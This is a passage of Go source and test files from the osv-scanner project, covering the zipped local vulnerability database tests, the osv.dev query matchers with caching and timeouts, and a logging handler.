protocmp.Transform()); diff != "" { t.Errorf("db is missing some vulnerabilities (-want +got):\n%s", diff) } } func cacheWrite(t *testing.T, storedAt string, cache []byte) { t.Helper() err := os.MkdirAll(path.Dir(storedAt), 0750) if err == nil { //nolint:gosec // being world readable is fine err = os.WriteFile(storedAt, cache, 0644) } if err != nil { t.Errorf("unexpected error with cache: %v", err) } } func cacheWriteBad(t *testing.T, storedAt string, contents string) { t.Helper() err := os.MkdirAll(path.Dir(storedAt), 0750) if err == nil { //nolint:gosec // being world readable is fine err = os.WriteFile(storedAt, []byte(contents), 0644) } if err != nil { t.Errorf("unexpected error with cache: %v", err) } } func createZipServer(t *testing.T, handler http.HandlerFunc) *httptest.Server { t.Helper() ts := httptest.NewServer(handler) t.Cleanup(ts.Close) return ts } func computeCRC32CHash(t *testing.T, data []byte) string { t.Helper() hash := crc32.Checksum(data, crc32.MakeTable(crc32.Castagnoli)) return base64.StdEncoding.EncodeToString(binary.BigEndian.AppendUint32([]byte{}, hash)) } func writeOSVsZip(t *testing.T, w http.ResponseWriter, osvs map[string]*osvschema.Vulnerability) (int, error) { t.Helper() z := zipOSVs(t, osvs) w.Header().Add("x-goog-hash", "crc32c="+computeCRC32CHash(t, z)) return w.Write(z) } func zipOSVs(t *testing.T, osvs map[string]*osvschema.Vulnerability) []byte { t.Helper() buf := new(bytes.Buffer) writer := zip.NewWriter(buf) for fp, osv := range osvs { data, err := protojson.Marshal(osv) if err != nil { t.Fatalf("could not marshal %v: %v", osv, err) } f, err := writer.Create(fp) if err != nil { t.Fatal(err) } _, err = f.Write(data) if err != nil { t.Fatal(err) } } if err := writer.Close(); err != nil { t.Fatal(err) } return buf.Bytes() } //nolint:unparam // name might get changed at some point func determineStoredAtPath(dbBasePath, name string) string { return path.Join(dbBasePath, name, "all.zip") } func TestNewZippedDB_Offline_WithoutCache(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(_ http.ResponseWriter, _ *http.Request) { t.Errorf("a server request was made when running offline") }) _, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, true, nil) if !errors.Is(err, localmatcher.ErrOfflineDatabaseNotFound) { t.Errorf("expected \"%v\" error but got \"%v\"", localmatcher.ErrOfflineDatabaseNotFound, err) } } func TestNewZippedDB_Offline_WithCache(t *testing.T) { t.Parallel() osvs := []*osvschema.Vulnerability{ {Id: "GHSA-1"}, {Id: "GHSA-2"}, {Id: "GHSA-3"}, {Id: "GHSA-4"}, {Id: "GHSA-5"}, } testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(_ http.ResponseWriter, _ *http.Request) { t.Errorf("a server request was made when running offline") }) cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, "GHSA-4.json": {Id: "GHSA-4"}, "GHSA-5.json": {Id: "GHSA-5"}, })) db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, true, nil) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } if db.Partial != false { t.Errorf("db is incorrectly marked as partially loaded") } expectDBToHaveOSVs(t, db, osvs) } func TestNewZippedDB_BadZip(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = w.Write([]byte("this is not a zip")) }) _, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err == nil { t.Errorf("expected an error but did not get one") } } func TestNewZippedDB_UnsupportedProtocol(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) _, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", "file://hello-world", userAgent, false, nil) if err == nil { t.Errorf("expected an error but did not get one") } } func TestNewZippedDB_Online_WithoutCache(t *testing.T) { t.Parallel() osvs := []*osvschema.Vulnerability{ {Id: "GHSA-1"}, {Id: "GHSA-2"}, {Id: "GHSA-3"}, {Id: "GHSA-4"}, {Id: "GHSA-5"}, } testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, "GHSA-4.json": {Id: "GHSA-4"}, "GHSA-5.json": {Id: "GHSA-5"}, }) }) db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } if db.Partial != false { t.Errorf("db is incorrectly marked as partially loaded") } expectDBToHaveOSVs(t, db, osvs) } func TestNewZippedDB_Online_WithoutCacheAndNoHashHeader(t *testing.T) { t.Parallel() osvs := []*osvschema.Vulnerability{ {Id: "GHSA-1"}, {Id: "GHSA-2"}, {Id: "GHSA-3"}, {Id: "GHSA-4"}, {Id: "GHSA-5"}, } testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = w.Write(zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, "GHSA-4.json": {Id: "GHSA-4"}, "GHSA-5.json": {Id: "GHSA-5"}, })) }) db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } if db.Partial != false { t.Errorf("db is incorrectly marked as partially loaded") } expectDBToHaveOSVs(t, db, osvs) } func TestNewZippedDB_Online_WithSameCache(t *testing.T) { t.Parallel() osvs := []*osvschema.Vulnerability{ {Id: "GHSA-1"}, {Id: "GHSA-2"}, {Id: "GHSA-3"}, } testDir := testutility.CreateTestDir(t) cache := zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, }) ts := createZipServer(t, func(w http.ResponseWriter, r *http.Request) { if r.Method != http.MethodHead { t.Errorf("unexpected %s request", r.Method) } w.Header().Add("x-goog-hash", "crc32c="+computeCRC32CHash(t, cache)) _, _ = w.Write(cache) }) cacheWrite(t, determineStoredAtPath(testDir, "my-db"), cache) db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } if db.Partial != false { t.Errorf("db is incorrectly marked as partially loaded") } expectDBToHaveOSVs(t, db, osvs) } func TestNewZippedDB_Online_WithDifferentCache(t *testing.T) { t.Parallel() osvs := []*osvschema.Vulnerability{ {Id: "GHSA-1"}, {Id: "GHSA-2"}, {Id: "GHSA-3"}, {Id: "GHSA-4"}, {Id: "GHSA-5"}, } testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, "GHSA-4.json": {Id: "GHSA-4"}, "GHSA-5.json": {Id: "GHSA-5"}, }) }) cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, })) db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } if db.Partial != false { t.Errorf("db is incorrectly marked as partially loaded") } expectDBToHaveOSVs(t, db, osvs) } func TestNewZippedDB_Online_WithCacheButBadHeadResponse(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusBadRequest) }) cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, })) _, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err == nil { t.Errorf("expected an error but did not get one") } } func TestNewZippedDB_Online_WithCacheButBadHashHeader(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = w.Write(zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, "GHSA-4.json": {Id: "GHSA-4"}, "GHSA-5.json": {Id: "GHSA-5"}, })) w.Header().Add("x-goog-hash", "crc32c=bad-value") }) cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, })) _, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err == nil { t.Errorf("expected an error but did not get one") } } func TestNewZippedDB_Online_WithCacheButNoHashHeader(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = w.Write(zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, "GHSA-4.json": {Id: "GHSA-4"}, "GHSA-5.json": {Id: "GHSA-5"}, })) }) cacheWrite(t, determineStoredAtPath(testDir, "my-db"), zipOSVs(t, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, })) _, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err == nil { t.Errorf("expected an error but did not get one") } } func TestNewZippedDB_Online_WithBadCache(t *testing.T) { t.Parallel() osvs := []*osvschema.Vulnerability{ {Id: "GHSA-1"}, {Id: "GHSA-2"}, {Id: "GHSA-3"}, } testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{ "GHSA-1.json": {Id: "GHSA-1"}, "GHSA-2.json": {Id: "GHSA-2"}, "GHSA-3.json": {Id: "GHSA-3"}, }) }) cacheWriteBad(t, determineStoredAtPath(testDir, "my-db"), "this is not json!") db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } if db.Partial != false { t.Errorf("db is incorrectly marked as partially loaded") } expectDBToHaveOSVs(t, db, osvs) } func TestNewZippedDB_Online_WithBadGetResponse(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, r *http.Request) { if r.Method == http.MethodGet { w.WriteHeader(http.StatusMethodNotAllowed) return } _, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{}) }) _, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err == nil { t.Errorf("expected an error but did not get one") } } func TestNewZippedDB_FileChecks(t *testing.T) { t.Parallel() osvs := []*osvschema.Vulnerability{{Id: "GHSA-1234"}, {Id: "GHSA-4321"}} testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{ "file.json": {Id: "GHSA-1234"}, // only files with .json suffix should be loaded "file.yaml": {Id: "GHSA-5678"}, // (no longer) special case for the GH security database "advisory-database-main/advisories/unreviewed/file.json": {Id: "GHSA-4321"}, }) }) db, err := localmatcher.NewZippedDB(t.Context(), testDir, "my-db", ts.URL, userAgent, false, nil) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } if db.Partial != false { t.Errorf("db is incorrectly marked as partially loaded") } expectDBToHaveOSVs(t, db, osvs) } func TestNewZippedDB_WithSpecificPackages(t *testing.T) { t.Parallel() testDir := testutility.CreateTestDir(t) ts := createZipServer(t, func(w http.ResponseWriter, _ *http.Request) { _, _ = writeOSVsZip(t, w, map[string]*osvschema.Vulnerability{ "GHSA-1.json": { Id: "GHSA-1", Affected: []*osvschema.Affected{}, }, "GHSA-2.json": { Id: "GHSA-2", Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Name: "pkg-1"}}, }, }, "GHSA-3.json": { Id: "GHSA-3", }, "GHSA-4.json": { Id: "GHSA-4", Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Name: "pkg-2"}}, }, }, "GHSA-5.json": { Id: "GHSA-5", Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Name: "pkg-2"}}, {Package: &osvschema.Package{Name: "pkg-1"}}, }, }, "GHSA-6.json": { Id: "GHSA-6", Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Name: "pkg-3"}}, {Package: &osvschema.Package{Name: "pkg-2"}}, }, }, "GHSA-7.json": { Id: "GHSA-7", Affected: []*osvschema.Affected{ { Ranges: []*osvschema.Range{ {Type: osvschema.Range_SEMVER}, {Type: osvschema.Range_GIT, Repo: "https://github.com/org/repo"}, }, }, }, }, "GHSA-8.json": { Id: "GHSA-8", Affected: []*osvschema.Affected{ {Ranges: []*osvschema.Range{{Type: osvschema.Range_SEMVER}}}, {Ranges: []*osvschema.Range{{Type: osvschema.Range_GIT, Repo: "git://github.com/org/repo.git"}}}, }, }, "GHSA-9.json": { Id: "GHSA-9", Affected: []*osvschema.Affected{ { Ranges: []*osvschema.Range{ {Type: osvschema.Range_GIT, Repo: "https://github.com/anotherorg/anotherrepo"}, }, }, }, }, }) }) db, err := localmatcher.NewZippedDB( t.Context(), testDir, "my-db", ts.URL, userAgent, false, []*extractor.Package{{Name: "pkg-1"}, {Name: "pkg-3"}, {Name: "https://github.com/org/repo"}}, ) if err != nil { t.Fatalf("unexpected error \"%v\"", err) } // we are loaded for specific packages if db.Partial != true { t.Errorf("db is incorrectly marked as fully loaded") } expectDBToHaveOSVs(t, db, []*osvschema.Vulnerability{ { Id: "GHSA-2", Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Name: "pkg-1"}}, }, }, { Id: "GHSA-5", Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Name: "pkg-2"}}, {Package: &osvschema.Package{Name: "pkg-1"}}, }, }, { Id: "GHSA-6", Affected: []*osvschema.Affected{ {Package: &osvschema.Package{Name: "pkg-3"}}, {Package: &osvschema.Package{Name: "pkg-2"}}, }, }, { Id: "GHSA-7", Affected: []*osvschema.Affected{ {Ranges: []*osvschema.Range{ {Type: osvschema.Range_SEMVER}, {Type: osvschema.Range_GIT, Repo: "https://github.com/org/repo"}, }}, }, }, { Id: "GHSA-8", Affected: []*osvschema.Affected{ {Ranges: []*osvschema.Range{{Type: osvschema.Range_SEMVER}}}, {Ranges: []*osvschema.Range{{Type: osvschema.Range_GIT, Repo: "git://github.com/org/repo.git"}}}, }, }, }) } ================================================ FILE: internal/clients/clientimpl/osvmatcher/cachedosvmatcher.go ================================================ // Package osvmatcher implements two vulnerability matcher using osv.dev's API. package osvmatcher import ( "context" "errors" "maps" "slices" "sync" "time" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/clients/clientimpl/localmatcher" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/google/osv-scanner/v2/internal/utility/vulns" "github.com/ossf/osv-schema/bindings/go/osvschema" "golang.org/x/sync/errgroup" "osv.dev/bindings/go/api" "osv.dev/bindings/go/osvdev" "osv.dev/bindings/go/osvdevexperimental" ) // CachedOSVMatcher implements the VulnerabilityMatcher interface with a osv.dev client. // It sends out requests for every vulnerability of each package, which get cached. // Checking if a specific version matches an OSV record is done locally. // This should be used when we know the same packages are going to be repeatedly // queried multiple times, as in guided remediation. // TODO: This does not support commit-based queries. type CachedOSVMatcher struct { Client osvdev.OSVClient // InitialQueryTimeout allows you to set a timeout specifically for the initial paging query // If timeout runs out, whatever pages that has been successfully queried within the timeout will // still return fully hydrated. InitialQueryTimeout time.Duration vulnCache sync.Map // map[PackageKey][]osvschema.Vulnerability } func (matcher *CachedOSVMatcher) MatchVulnerabilities(ctx context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) { // populate vulnCache with missing packages if err := matcher.doQueries(ctx, pkgs); err != nil { return nil, err } results := make([][]*osvschema.Vulnerability, len(pkgs)) for i, pkg := range pkgs { if ctx.Err() != nil { return nil, ctx.Err() } cachedVulns, ok := matcher.vulnCache.Load( vulns.NewPackageKey(&osvschema.Package{ Name: imodels.Name(pkg), Ecosystem: imodels.Ecosystem(pkg).String(), })) if !ok { continue } results[i] = localmatcher.VulnerabilitiesAffectingPackage(cachedVulns.([]*osvschema.Vulnerability), pkg) } return results, nil } func (matcher *CachedOSVMatcher) doQueries(ctx context.Context, invs []*extractor.Package) error { var batchResp *api.BatchVulnerabilityList deadlineExceeded := false var queries []*api.Query // determine which packages aren't already cached // convert Package to Query for each pkgs element toQuery := make(map[*api.Query]struct{}) for _, inv := range invs { if imodels.Name(inv) == "" || imodels.Ecosystem(inv).IsEmpty() { continue } pkg := &osvschema.Package{ Name: imodels.Name(inv), Ecosystem: imodels.Ecosystem(inv).String(), } if _, ok := matcher.vulnCache.Load(vulns.NewPackageKey(pkg)); !ok { toQuery[&api.Query{Package: pkg}] = struct{}{} } } queries = slices.AppendSeq(make([]*api.Query, 0, len(toQuery)), maps.Keys(toQuery)) if len(queries) == 0 { return nil } var err error // If there is a timeout for the initial query, set an additional context deadline here. if matcher.InitialQueryTimeout > 0 { batchQueryCtx, cancelFunc := context.WithDeadline(ctx, time.Now().Add(matcher.InitialQueryTimeout)) batchResp, err = osvdevexperimental.BatchQueryPaging(batchQueryCtx, &matcher.Client, queries) cancelFunc() } else { batchResp, err = osvdevexperimental.BatchQueryPaging(ctx, &matcher.Client, queries) } if err != nil { // Deadline being exceeded is likely caused by a long paging time // if that's the case, we should return what we already got, and // then let the caller know it is not all the results. if errors.Is(err, context.DeadlineExceeded) { deadlineExceeded = true } else { return err } } vulnerabilities := make([][]*osvschema.Vulnerability, len(batchResp.GetResults())) g, ctx := errgroup.WithContext(ctx) g.SetLimit(maxConcurrentRequests) for batchIdx, resp := range batchResp.GetResults() { vulnerabilities[batchIdx] = make([]*osvschema.Vulnerability, len(resp.GetVulns())) for resultIdx, vuln := range resp.GetVulns() { g.Go(func() error { // exit early if another hydration request has already failed // results are thrown away later, so avoid needless work if ctx.Err() != nil { return nil //nolint:nilerr // this value doesn't matter to errgroup.Wait() } vuln, err := matcher.Client.GetVulnByID(ctx, vuln.GetId()) if err != nil { return err } vulnerabilities[batchIdx][resultIdx] = vuln return nil }) } } if err := g.Wait(); err != nil { return err } if deadlineExceeded { return context.DeadlineExceeded } for i, vs := range vulnerabilities { matcher.vulnCache.Store(vulns.NewPackageKey(queries[i].GetPackage()), vs) } return nil } ================================================ FILE: internal/clients/clientimpl/osvmatcher/osvmatcher.go ================================================ package osvmatcher import ( "context" "errors" "net/http" "time" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scanner/v2/internal/cachedregexp" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/imodels" "github.com/ossf/osv-schema/bindings/go/osvconstants" "github.com/ossf/osv-schema/bindings/go/osvschema" "golang.org/x/sync/errgroup" "osv.dev/bindings/go/api" "osv.dev/bindings/go/osvdev" "osv.dev/bindings/go/osvdevexperimental" ) const ( maxConcurrentRequests = 1000 ) // goVersionSuffixRegexp matches a Golang major suffix in a PURL's subpath. // // Matches: // - v4 - v4 // - /v5/sdk/internal - v5 // // Does not match: // - sdk/internal // - /sdk/resourcemanager/iothub/armiothub var goVersionSuffixRegexp = cachedregexp.MustCompile(`^/?(v\d+)`) // OSVMatcher implements the VulnerabilityMatcher interface with an osv.dev client. // It sends out requests for every package version and does not perform caching. type OSVMatcher struct { Client osvdev.OSVClient // InitialQueryTimeout allows you to set a timeout specifically for the initial paging query // If timeout runs out, whatever pages that has been successfully queried within the timeout will // still return fully hydrated. InitialQueryTimeout time.Duration } func New(initialQueryTimeout time.Duration, userAgent string, httpClient *http.Client) *OSVMatcher { if httpClient == nil { httpClient = http.DefaultClient } config := osvdev.DefaultConfig() config.UserAgent = userAgent return &OSVMatcher{ Client: osvdev.OSVClient{ HTTPClient: httpClient, Config: config, BaseHostURL: osvdev.DefaultBaseURL, }, InitialQueryTimeout: initialQueryTimeout, } } // MatchVulnerabilities matches vulnerabilities for a list of packages. func (matcher *OSVMatcher) MatchVulnerabilities(ctx context.Context, pkgs []*extractor.Package) ([][]*osvschema.Vulnerability, error) { var batchResp *api.BatchVulnerabilityList deadlineExceeded := false { var err error // convert Package to Query for each pkgs element queries := pkgsToQueries(pkgs) // If there is a timeout for the initial query, set an additional context deadline here. if matcher.InitialQueryTimeout > 0 { batchQueryCtx, cancelFunc := context.WithDeadline(ctx, time.Now().Add(matcher.InitialQueryTimeout)) batchResp, err = osvdevexperimental.BatchQueryPaging(batchQueryCtx, &matcher.Client, queries) cancelFunc() } else { batchResp, err = osvdevexperimental.BatchQueryPaging(ctx, &matcher.Client, queries) } if err != nil { // Deadline being exceeded is likely caused by a long paging time // if that's the case, we should return what we already got, and // then let the caller know it is not all the results. if errors.Is(err, context.DeadlineExceeded) { deadlineExceeded = true } else { return nil, err } } // No results found - this could be due to a timeout if batchResp == nil { return nil, err } } vulnerabilities := make([][]*osvschema.Vulnerability, len(batchResp.GetResults())) g, ctx := errgroup.WithContext(ctx) g.SetLimit(maxConcurrentRequests) for batchIdx, resp := range batchResp.GetResults() { vulnerabilities[batchIdx] = make([]*osvschema.Vulnerability, len(resp.GetVulns())) for resultIdx, vuln := range resp.GetVulns() { g.Go(func() error { // exit early if another hydration request has already failed // results are thrown away later, so avoid needless work if ctx.Err() != nil { return nil //nolint:nilerr // this value doesn't matter to errgroup.Wait() } vuln, err := matcher.Client.GetVulnByID(ctx, vuln.GetId()) if err != nil { return err } vulnerabilities[batchIdx][resultIdx] = vuln return nil }) } } if err := g.Wait(); err != nil { return nil, err } if deadlineExceeded { return vulnerabilities, context.DeadlineExceeded } return vulnerabilities, nil } func pkgToQuery(pkg *extractor.Package) *api.Query { if imodels.Name(pkg) != "" && !imodels.Ecosystem(pkg).IsEmpty() && imodels.Version(pkg) != "" { name := imodels.Name(pkg) // Tools like Syft create Go PURLs where the module's major suffix is part // of the subpath as opposed to the package name: // // pkg:golang/github.com/go-jose/go-jose@v4.1.3#v4 // // For a correct match we need to add the major suffix back if imodels.Ecosystem(pkg).Ecosystem == osvconstants.EcosystemGo && pkg.PURL().Subpath != "" { match := goVersionSuffixRegexp.FindStringSubmatch(pkg.PURL().Subpath) if match != nil { name += "/" + match[1] } } return &api.Query{ Package: &osvschema.Package{ Name: name, Ecosystem: imodels.Ecosystem(pkg).String(), }, Param: &api.Query_Version{ Version: imodels.Version(pkg), }, } } if imodels.Commit(pkg) != "" { return &api.Query{ Param: &api.Query_Commit{ Commit: imodels.Commit(pkg), }, } } // This should have be filtered out before reaching this point cmdlogger.Errorf("invalid query element: %#v", pkg) return nil } // pkgsToQueries converts packages to queries via the osv-scanner internal imodels // to perform the necessary transformations func pkgsToQueries(pkgs []*extractor.Package) []*api.Query { queries := make([]*api.Query, len(pkgs)) for i, pkg := range pkgs { queries[i] = pkgToQuery(pkg) } return queries } ================================================ FILE: internal/clients/clientimpl/osvmatcher/osvmatcher_test.go ================================================ package osvmatcher import ( "context" "errors" "reflect" "testing" "time" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/purl" "github.com/ossf/osv-schema/bindings/go/osvschema" "osv.dev/bindings/go/osvdev" ) func TestOSVMatcher_MatchVulnerabilities(t *testing.T) { t.Parallel() type fields struct { Client osvdev.OSVClient InitialQueryTimeout time.Duration } type args struct { pkgs []*extractor.Package } tests := []struct { name string fields fields args args want [][]*osvschema.Vulnerability wantErr error }{ { name: "Timeout_returns_deadline_exceeded_error_(http.Client_code)", fields: fields{ Client: *osvdev.DefaultClient(), // Long enough to not timeout until we enter the http client code InitialQueryTimeout: 1 * time.Millisecond, }, args: args{ pkgs: []*extractor.Package{ { Name: "stdlib", Version: "1.22.0", PURLType: purl.TypeGolang, }, }, }, want: nil, wantErr: context.DeadlineExceeded, }, { name: "Timeout_returns_deadline_exceeded_error_(osv.dev_code)", fields: fields{ Client: *osvdev.DefaultClient(), // Short enough to test timeouts before reaching the http client InitialQueryTimeout: 100 * time.Nanosecond, }, args: args{ pkgs: []*extractor.Package{ { Name: "stdlib", Version: "1.22.0", PURLType: purl.TypeGolang, }, }, }, want: nil, wantErr: context.DeadlineExceeded, }, } for i := range tests { tt := tests[i] t.Run(tt.name, func(t *testing.T) { t.Parallel() matcher := &OSVMatcher{ Client: tt.fields.Client, InitialQueryTimeout: tt.fields.InitialQueryTimeout, } got, err := matcher.MatchVulnerabilities(t.Context(), tt.args.pkgs) if !errors.Is(err, tt.wantErr) { t.Errorf("OSVMatcher.MatchVulnerabilities() error = %v, wantErr %v", err, tt.wantErr) } if !reflect.DeepEqual(got, tt.want) { t.Errorf("OSVMatcher.MatchVulnerabilities() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/clients/clientinterfaces/licensematcher.go ================================================ // Package clientinterfaces defines interfaces for external accessors used in osv-scanner. package clientinterfaces import ( "context" "github.com/google/osv-scalibr/extractor" ) type LicenseMatcher interface { MatchLicenses(ctx context.Context, psr []*extractor.Package) error } ================================================ FILE: internal/clients/clientinterfaces/vulnerabilitymatcher.go ================================================ package clientinterfaces import ( "context" "github.com/google/osv-scalibr/extractor" "github.com/ossf/osv-schema/bindings/go/osvschema" ) type VulnerabilityMatcher interface { MatchVulnerabilities(ctx context.Context, invs []*extractor.Package) ([][]*osvschema.Vulnerability, error) } ================================================ FILE: internal/cmdlogger/fmt.go ================================================ // Package cmdlogger provides wrapper for slog logging commands. package cmdlogger import ( "cmp" "fmt" "log/slog" ) func Debugf(msg string, args ...any) { logger := cmp.Or(GlobalLogger, slog.Default()) logger.Debug(fmt.Sprintf(msg, args...)) } func Infof(msg string, args ...any) { logger := cmp.Or(GlobalLogger, slog.Default()) logger.Info(fmt.Sprintf(msg, args...)) } func Warnf(msg string, args ...any) { logger := cmp.Or(GlobalLogger, slog.Default()) logger.Warn(fmt.Sprintf(msg, args...)) } func Errorf(msg string, args ...any) { logger := cmp.Or(GlobalLogger, slog.Default()) logger.Error(fmt.Sprintf(msg, args...)) } ================================================ FILE: internal/cmdlogger/handler.go ================================================ package cmdlogger import ( "context" "fmt" "io" "log/slog" "strings" ) var ( GlobalLogger *slog.Logger ) type Handler struct { stdout io.Writer stderr io.Writer hasErrored bool everythingToStderr bool level slog.Leveler overrideHandler slog.Handler hasErroredBecauseInvalidConfig bool } // SendEverythingToStderr tells the logger to send all logs to stderr regardless // of their level. // // This is useful if we're expecting to output structured data to stdout such // as JSON, which cannot be mixed with other output. func (c *Handler) SendEverythingToStderr() { c.everythingToStderr = true } func (c *Handler) SetLevel(level slog.Leveler) { c.level = level } func (c *Handler) writer(level slog.Level) io.Writer { if c.everythingToStderr || level == slog.LevelError { return c.stderr } return c.stdout } func (c *Handler) Enabled(ctx context.Context, level slog.Level) bool { if level == slog.LevelError { c.SetHasErrored() } if c.overrideHandler != nil { return c.overrideHandler.Enabled(ctx, level) } return level >= c.level.Level() } func (c *Handler) Handle(ctx context.Context, record slog.Record) error { // todo: we probably want to be reporting disabled plugins in some way, // but currently our snapshot-based tests cannot handle os-dependent // output and we've got some plugins that are only available for linux if strings.HasPrefix(record.Message, "Disabling plugin ") { return nil } if record.Level == slog.LevelError { c.SetHasErrored() if strings.HasPrefix(record.Message, "Ignored invalid config file") { c.hasErroredBecauseInvalidConfig = true } } if c.overrideHandler != nil { return c.overrideHandler.Handle(ctx, record) } _, err := fmt.Fprint(c.writer(record.Level), record.Message+"\n") return err } func (c *Handler) SetHasErrored() { c.hasErrored = true } // HasErrored returns true if there have been any calls to Handle with // a level of [slog.LevelError] func (c *Handler) HasErrored() bool { return c.hasErrored } // HasErroredBecauseInvalidConfig returns true if there have been any calls to // Handle with a level of [slog.LevelError] due to a config file being invalid func (c *Handler) HasErroredBecauseInvalidConfig() bool { return c.hasErroredBecauseInvalidConfig } func (c *Handler) WithAttrs(a []slog.Attr) slog.Handler { if c.overrideHandler != nil { return c.overrideHandler.WithAttrs(a) } panic("not supported") } func (c *Handler) WithGroup(g string) slog.Handler { if c.overrideHandler != nil { return c.overrideHandler.WithGroup(g) } panic("not supported") } var _ CmdLogger = &Handler{} func New(stdout, stderr io.Writer) CmdLogger { return &Handler{ stdout: stdout, stderr: stderr, level: slog.LevelInfo, } } func NewOverride(overrideHandler slog.Handler) CmdLogger { return &Handler{ overrideHandler: overrideHandler, } } ================================================ FILE: internal/cmdlogger/interface.go ================================================ package cmdlogger import "log/slog" type CmdLogger interface { slog.Handler SendEverythingToStderr() SetHasErrored() 